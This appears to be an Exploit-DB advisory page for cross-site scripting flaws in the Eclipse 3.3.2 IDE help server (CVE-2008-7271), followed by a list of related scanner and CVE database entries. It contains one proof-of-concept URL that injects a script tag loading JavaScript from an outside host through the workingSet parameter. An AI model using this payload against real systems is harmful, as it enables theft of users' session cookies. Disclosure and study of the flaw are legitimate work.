Lucene search
RobEDB-ID:35243HistoryApr 24, 2008 - 12:00 a.m.
Eclipse 3.3.2 IDE - 'Help Server help/advanced/workingSetManager.jsp?workingSet' Cross-Site Scripting
2008-04-2400:00:00
Rob
www.exploit-db.com
24
source: https://www.securityfocus.com/bid/45921/info
Eclipse IDE is prone to multiple cross-site-scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Eclipse IDE 3.3.2 is vulnerable; other versions may also be affected.
http://www.example.com/help/advanced/workingSetManager.jsp?operation=add&workingSet='%3E%3Cscript%20src%3D'http%3A%2F%2F1.2.3.4%2Fa.js'%3E%3C%2Fscript%3E
&hrefs=%2Fcom.adobe.flexbuilder.help.api%2Ftoc.xml&oldName=Related
openvas
openvas
Eclipse IDE < 3.6.2 Help Contents Multiple XSS Vulnerabilities
2011-02-17 00:00:00
exploitdb
exploitdb
ubuntucve
ubuntucve
CVE-2008-7271
2011-01-13 00:00:00
debiancve
debiancve
CVE-2008-7271
2011-01-13 19:00:00
cve
cve
CVE-2008-7271
2011-01-13 19:00:01
prion
prion
Cross site scripting
2011-01-13 19:00:00
nvd
nvd
CVE-2008-7271
2011-01-13 19:00:01
cvelist
cvelist
CVE-2008-7271
2011-01-13 18:35:00
nessus
nessus
RHEL 5 : eclipse (Unpatched Vulnerability)
2024-06-03 00:00:00
